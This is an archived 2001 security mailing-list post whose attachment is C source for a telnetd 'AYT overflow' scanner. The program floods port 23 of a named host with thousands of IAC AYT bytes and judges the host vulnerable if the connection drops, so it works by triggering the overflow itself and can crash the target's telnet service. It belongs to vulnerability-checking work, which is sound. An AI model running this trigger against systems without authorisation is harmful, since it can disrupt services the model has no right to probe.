Date: Wed, 25 Jul 2001 20:50:31 +0200
From: info <[email protected]>
To: [email protected]Subject: Telnetd AYT overflow scanner
--nVMJ2NtxeReIH9PS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
--nVMJ2NtxeReIH9PS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="SPtelnetAYT.c"
/*
* Telnetd AYT overflow scanner, by Security Point(R)
* Bug found by scut of TESO Security
*
* Date: 25/07/01
* Author: Security Point(R)
* WWW: http://www.secpoint.com
* Email: [email protected]
*
* This program checks for the AYT overflow realted to the
* newly discovered telnetd vulnerabilities.
*
* Tested agianst:
* Vulnerable:
* netkit-telnet-0.10
* FreeBSD 4.2
* Not vulnerable:
* netkit-telnet-0.17
*
* Please keep us updated whith the os's that you check, and
* report back to us on [email protected], weather the system
* is vulnerable or not. So we can construct a full list
* of vulnerable systems.
*
*
* This source code is for educational purpose ONLY,
* Security Point(R) will not be responsible for any damages
* whatsoever that have a connection with this code. There are
* no warranties with regard to this information.
*
* Are your networks under attack at this moment?
*
* With Security Point(R) Scanner you can find and repair the
* Vulnerabilities before the bad guys get in.
*
* Please see http://www.secpoint.com/solutions.php
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>
struct in_addr addr;
struct sockaddr_in address;
struct hostent *host;
int sock;
char sendbuffer[5120*2];
char buffer[5120*2];
int i;
int timeout;
void handle_alarm(int signum) {
alarm(0);
timeout=1;
}
int main (int argc, char *argv[]) {
printf("Telnetd AYT overflow scanner, by Security Point(R)\n");
if (argc!=2) {
printf("Usage: %s <host>\n", argv[0]);
exit(EXIT_FAILURE);
}
printf("Host: %s\n", argv[1]);
if ((host=gethostbyname(argv[1])) == NULL) {
perror("gethostbyname");
exit(0);
exit(EXIT_FAILURE);
}
if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) {
perror("socket");
exit(EXIT_FAILURE);
}
bcopy(host->h_addr, (char *)&address.sin_addr, host->h_length);
address.sin_family=AF_INET;
address.sin_port = htons(23); // telnet
if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) {
perror("connect");
exit(EXIT_FAILURE);
}
printf("Connected to remote host...\n",argv[1]);
printf("Sending telnet options... stand by...\n");
signal(SIGALRM,handle_alarm);
bzero(sendbuffer,sizeof(sendbuffer));
for (i=0;i!=(sizeof(sendbuffer)/2);i++) {
sprintf(sendbuffer,"%s%c%c",sendbuffer,255,246); // 0xff 0xf6 - IAC AYT
}
alarm(60);
read(sock, buffer, sizeof(buffer));
alarm(0);
write(sock, sendbuffer, strlen(sendbuffer));
bzero(buffer,sizeof(buffer));
alarm(60);
if (read(sock, buffer, sizeof(buffer)) <=0) {
printf("Telnetd on %s vulnerable\n",argv[1]);
exit(EXIT_SUCCESS);
}
alarm(0);
printf("Telnetd on %s not vulnerable\n",argv[1]);
exit(EXIT_SUCCESS);
}
--nVMJ2NtxeReIH9PS--
